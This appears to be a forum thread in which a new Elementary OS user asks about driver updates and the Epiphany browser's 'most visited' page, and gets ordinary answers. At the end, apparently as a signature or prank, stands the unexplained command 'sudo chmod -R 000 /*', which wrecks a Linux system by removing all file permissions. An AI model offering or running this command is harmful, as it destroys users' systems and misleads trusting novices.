Hey! I installed Elementary OS today because I wanted to try out Linux.

- How do I update the drivers? Windows update usually does this aromatically (realtek audio and network drivers, for example)

- The browser that comes pre-installed (Epiphany) shows "most visited" each time I open a new tab. Can I change this? I don't want it to show me my "most visited" sites or even keep track of them.

You don't really. What you do is when you download patches, either manually or via a schedule set by the OS, it'll come with any drivers needed.

If you want to do it manually, that's a different story and a LOT more complex.

NOTE: I no longer frequent this site. If you really need help, PM/DM me and my e.mail will alert me.

Just update the system, system drivers usually either count as packages or are part of other packages.

I don't know about Epiphany, but you can install pretty much any browser you like. I know for sure that Firefox can do what you're asking.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
